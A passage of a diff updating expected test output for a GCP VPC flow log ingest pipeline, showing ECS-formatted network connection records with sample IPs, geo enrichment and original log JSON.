"destination": { "geo": { "continent_name": "America", @@ -24633,6 +25839,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415302045Z", + "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:50.733935895Z", + "end": "2019-06-14T03:49:50.856250208Z", + "id": "14iipwlfd8t01e", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24644,25 +25860,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -24673,23 +25888,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392550800Z", - "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:50.733935895Z", - "end": "2019-06-14T03:49:50.856250208Z", - "id": "14iipwlfd8t01e", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -24698,11 +25904,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 59924, @@ -24710,6 +25921,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415302523Z", + "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:08.092659117Z", + "end": "2019-06-14T03:41:08.213471928Z", + "id": "14iipwlfd8t01q", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24721,17 +25942,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "192.168.2.117", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -24752,21 +25978,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392556300Z", - "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:08.092659117Z", - "end": "2019-06-14T03:41:08.213471928Z", - "id": "14iipwlfd8t01q", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -24787,6 +25998,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415302932Z", + "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:50.733935895Z", + "end": "2019-06-14T03:49:50.856250208Z", + "id": "14iipwlfd8t01i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24798,19 +26019,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 123 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -24821,38 +26053,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392560400Z", - "original": "{\"insertId\":\"14iipwlfd8t01i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":58658},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:50.733935895Z", - "end": "2019-06-14T03:49:50.856250208Z", - "id": "14iipwlfd8t01i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65272, @@ -24866,6 +26080,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415303337Z", + "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403442252Z", + "end": "2019-06-14T03:49:56.316981133Z", + "id": "14iipwlfd8t01k", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24877,25 +26101,24 @@ "iana_number": "6", "packets": 618, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 123 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -24906,23 +26129,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 115 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392564500Z", - "original": "{\"insertId\":\"14iipwlfd8t01k\",\"jsonPayload\":{\"bytes_sent\":\"123732\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65272,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"618\",\"reporter\":\"SRC\",\"rtt_msec\":\"123\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403442252Z", - "end": "2019-06-14T03:49:56.316981133Z", - "id": "14iipwlfd8t01k", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -24931,13 +26145,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65273, @@ -24945,6 +26162,16 @@ "ip": "67.43.156.13", "packets": 710 }, + "event": { + "ingested": "2021-12-14T14:43:27.415303753Z", + "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378287Z", + "end": "2019-06-14T03:49:56.316930467Z", + "id": "14iipwlfd8t01f", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24956,19 +26183,30 @@ "iana_number": "6", "packets": 710, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.73.186.17", + "192.168.2.73" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 242 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -24979,29 +26217,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 115 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392567800Z", - "original": "{\"insertId\":\"14iipwlfd8t01f\",\"jsonPayload\":{\"bytes_sent\":\"76342\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65273},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"710\",\"reporter\":\"DEST\",\"rtt_msec\":\"115\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378287Z", - "end": "2019-06-14T03:49:56.316930467Z", - "id": "14iipwlfd8t01f", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", @@ -25024,6 +26241,16 @@ "domain": "infraops-docker-data", "ip": "10.73.186.17" }, + "event": { + "ingested": "2021-12-14T14:43:27.415304141Z", + "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:23.705320616Z", + "end": "2019-06-14T03:44:23.955039461Z", + "id": "14iipwlfd8t018", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25035,25 +26262,24 @@ "iana_number": "6", "packets": 13, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.73.186.17", - "192.168.2.73" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 242 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25064,23 +26290,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 37 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392572200Z", - "original": "{\"insertId\":\"14iipwlfd8t018\",\"jsonPayload\":{\"bytes_sent\":\"9761\",\"connection\":{\"dest_ip\":\"192.168.2.73\",\"dest_port\":45224,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"end_time\":\"2019-06-14T03:44:23.955039461Z\",\"packets_sent\":\"13\",\"reporter\":\"SRC\",\"rtt_msec\":\"242\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:23.705320616Z", - "end": "2019-06-14T03:44:23.955039461Z", - "id": "14iipwlfd8t018", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -25089,11 +26306,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56410, @@ -25101,6 +26323,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415304526Z", + "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:10.514594429Z", + "end": "2019-06-14T03:47:10.630345069Z", + "id": "14iipwlfd8t01a", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25112,19 +26344,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 95 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25135,38 +26378,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 37 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392577900Z", - "original": "{\"insertId\":\"14iipwlfd8t01a\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":56410},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"37\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:10.514594429Z", - "end": "2019-06-14T03:47:10.630345069Z", - "id": "14iipwlfd8t01a", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65277, @@ -25180,6 +26405,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415304923Z", + "original": 